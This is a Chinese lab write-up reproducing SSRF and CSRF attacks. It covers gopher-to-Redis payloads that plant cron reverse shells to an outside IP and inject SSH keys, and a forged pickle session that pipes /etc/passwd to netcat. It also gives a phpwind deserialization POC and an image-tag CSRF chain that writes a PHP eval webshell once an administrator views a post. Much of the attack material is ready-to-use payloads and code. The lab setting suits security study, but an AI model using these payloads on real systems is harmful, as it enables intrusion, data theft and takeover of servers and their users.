当前位置: 首页 > article >正文

SSRF和CSRF实战复现

文章目录

      • SSRF
        • Web-Hacking-Lab-master
          • 1、Centos未授权访问
          • 2、Ubuntu未授权访问
          • 3、Ubuntu传入公钥访问
          • 4、ssrf_redis_lab_pickle_redis_lab
      • CSRF:windphp

SSRF

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

file–>读取文件

dict–>探测端口

gopher–>实现入侵

多以gopher+redis+fastcgi结合入侵

gopher+redis :1、上传webshell(必须知道它的物理路径、redis权限要求够高、redis没有密码、安全模式必须关闭)2、写ssh 3、cron写任务计划(在Ubuntu上不成功因为文件创建权限为644,必须为600)4、利用CRLF换行头漏洞,用ssrf把redis的session写入进去,写入过程中会用python进行一个序列化,然后在redis进行读取的时候将session进行反序列化执行我们传入的代码

Web-Hacking-Lab-master
1、Centos未授权访问

1、docker拉取镜像
在这里插入图片描述
2、本地浏览器访问服务器2222端口,进入页面
3、进行端口探测
1)输入dict://127.0.0.1:6379发现服务器6379是开放的
2)使用工具进行时间计划写入反弹shell,生成payload
在这里插入图片描述
3)将payload进行url解码了解原理:

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$73


*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/7777 0>&1'


*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

总结:第一步清除redis数据以免影响我们写入数据(实战中不可取),set一个键,输入我们的反弹代码,然后将这个键值在Linux系统里落盘,落盘路径是/var/spool/cron/,文件名root。
4)将工具生成的payload的输入进页面,提交。
5)本机进行监听端口7777。
在这里插入图片描述

2、Ubuntu未授权访问

1、docker拉取镜像
在这里插入图片描述
2、本地浏览器访问服务器1111端口,进入页面
3、进行端口探测
1)输入dict://127.0.0.1:6379发现服务器6379是开放的
2)使用工具进行时间计划写入反弹shell,生成payload
在这里插入图片描述
代码分析:

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$75


*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/6666 0>&1'


*4
$6
config
$3
set
$3
dir
$24
/var/spool/cron/crontabs
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

总结:基本与上同,只是落盘路径不一样,Ubuntu落盘文件是/var/spool/cron/crontabs。
3)提交payload,发现失败,无法反弹shell,可能原因有,①落盘路径不可写 ②Ubuntu的计划文件权限必须是600③redis版本没有漏洞(建议靶场使用redis5.0.5版本)
4)Ubuntu时间计划写入反弹shell失败。

3、Ubuntu传入公钥访问

1、拉取环境
2、生成公钥:

ssh-keygen -t rsa

在这里插入图片描述

3、用本机工具生成payload生成公钥
在这里插入图片描述
4、传入payload,结果如下:
在这里插入图片描述
由于redis版本是stable,长期稳固版本,公钥传入失败。
5、我自己在docker环境里传入我的公钥试试,然后ssh远程登录,发现成功。

在这里插入图片描述

4、ssrf_redis_lab_pickle_redis_lab

1、拉取环境,访问反序列化的环境页面,分析app.py文件的代码,发现系统是将session里的cookie进行base64加密序列化,然后使用的时候是将cookie进行反序列化base64解密,我们可以通过对传入的session进行伪造,写入我们的代码进行base64加密并序列化,等系统使用的时候会反序列化执行我们的代码。(flask里会默认将session进行重置,即当你覆盖完原本的session值,在执行完流程后会自动变为原本的session值)
在这里插入图片描述

在这里插入图片描述

2、查看payload原理

http://127.0.0.1:6379/_

*3
$3
set
$44
session:e6d2a82e-cafb-44c1-91ac-3b271a29f24c
$92
Y3Bvc2l4CnN5c3RlbQpwMAooUydjYXQgL2V0Yy9wYXNzd2QgfCBuYyAxMjcuMC4wLjEgOTA5MScKcDEKdHAyClJwMwou

在这里插入图片描述
3、提交payload
在这里插入图片描述
python的httplib自动把%0D%0A过滤了,有些python版本会过滤,有些不会,反正就尝试一下嘛。

CSRF:windphp

- 回调函数 call_user_func_array()
- spl_autoload 、 spl_autoload_register 、 __autoload 三个函数
- 利用数组+命名空间加载相同名字的类
- 利用StdClass代替对象数组
- **将CSRF和反序列化结合,从而使只能在后台触发的序列化漏洞,变为前台getshell。降低漏洞利用条件。**
- CSRF利用技巧

POC:

<?php
namespace src\library\utility {
    class PwDelayRun{

    }
}
namespace{
	class PwDelayRun{
		private $_callback;
		private $_args;
		function __construct()
		{
        $this->_callback = [
			'assert'
        ];
        $this->_args = [
            ["phpinfo();exit;"]
        ];
    }
}

header("Content-Type: text/plain");
$obj = new stdClass();
$obj->a =  new src\library\utility\PwDelayRun();
$obj->b = new PwDelayRun();
echo urlencode(serialize($obj));
}
?>

拿到payload:

http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D

在这里插入图片描述
1、创建一个php文件,x写入如下代码:

<?php
header("Content-Type: image/gif");
header("Location: http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A77%3A%22file_put_contents%28%22.%2Fshell.php%22%2C%27%3C%3Fphp+%40eval%28%24_POST%5Ba%5D%29%3B%3F%3E%27%29%3B+phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D");
?>

2、发帖,发图片,选择用代码发,代码如下:

[img]http://127.0.0.1/oupeng.php[/img]

在这里插入图片描述
3、可以看到此时没有shell文件
在这里插入图片描述
4、登录管理员账号
在这里插入图片描述
5、此时出现shell.php文件,反弹shell

在这里插入图片描述
6、测试显示成功
在这里插入图片描述


http://www.kler.cn/a/283470.html

相关文章:

  • Python高级编程模式和设计模式
  • LlamaIndex
  • Centos安装Elasticsearch教程
  • 【大数据学习 | HBASE高级】rowkey的设计,hbase的预分区和压缩
  • MySQL技巧之跨服务器数据查询:进阶篇-从A数据库复制到B数据库的表中
  • 尽量通俗易懂地概述.Net U nity跨语言/跨平台相关知识
  • 【自动驾驶】决策规划算法概述
  • Kafka消息积压的典型场景及解决方案
  • SSRF以及CSRF
  • Vue3.0项目实战(二)——大事件管理系统登录注册功能实现
  • 快讯 | Midjourney开拓硬件领域:苹果前经理加盟助力发展
  • 防御Nginx负载均衡中的拒绝服务攻击:策略与实践
  • OpenCV详细介绍
  • Eureka的生命周期管理:服务注册、续约与下线的完整流程解析
  • uniapp,uview:inputnumber或者input,当type为number的时候,在ios里输入不了小数的问题
  • 本地部署aniportrait
  • 【Redis】Redis 的消息队列 List、Streams—(六)
  • Golang测试func TestXX(t *testing.T)的使用
  • 【GPT】Coze使用开放平台接口-【2】创建工作流-语音伪造检测工作流
  • Golang | Leetcode Golang题解之第375题猜数字大小II
  • XSS漏洞
  • 数组、向量与矩阵
  • 【Unity优化】优化Android平台拖动地图表现
  • zabbix安装过程中仓库不可用问题解决
  • uniapp中H5网页怎么实现自动点击事件
  • 自动化测试经典面试题